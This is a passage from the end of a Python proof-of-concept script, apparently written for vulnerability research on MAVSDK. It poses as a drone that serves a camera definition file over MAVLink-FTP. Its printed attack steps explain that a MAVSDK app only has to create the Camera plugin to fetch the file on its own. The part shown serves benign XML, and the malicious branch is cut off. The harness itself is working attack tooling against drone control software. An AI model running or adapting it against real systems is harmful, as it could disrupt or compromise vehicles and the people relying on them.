    else:
        served = BENIGN_CAM_DEF_XML
        observe("serving %d bytes of ordinary XML" % len(served))

    if args.ftp_name:
        m = dict(m, name=args.ftp_name)
    uri = "mftp://" + m["name"]
    observe("cam_definition_uri = %r" % uri)

    sys.argv = [sys.argv[0]] + rest
    base = FakeVehicle.from_cli("MAVSDK-03 camera definition bomb")
    v = MavsdkCameraVehicle(base.conn_str, sysid=base.sysid, compid=base.compid,
                            verbose=base.verbose, cam_uri=uri,
                            cam_model=args.model, cam_vendor=args.vendor)
    observe("model_name=%r vendor_name=%r  -> cache tag "
            "'camera_definition-%s_%s-1.xml'" % (args.model, args.vendor,
                                                 args.model, args.vendor))
    v.add_ftp_file(m["name"], served)
    v.add_ftp_dir_entry(m["name"], size=len(served), is_dir=False)
    observe("serving %r over MAVLink-FTP (%s bytes)" % (m["name"], format(len(served), ",")))

    v.start()
    attack("Start the MAVSDK app and point it at this host. It only has to create")
    attack("the Camera plugin -- MAVSDK requests the definition on its own.")
    v.serve_forever()


if __name__ == "__main__":
    main()
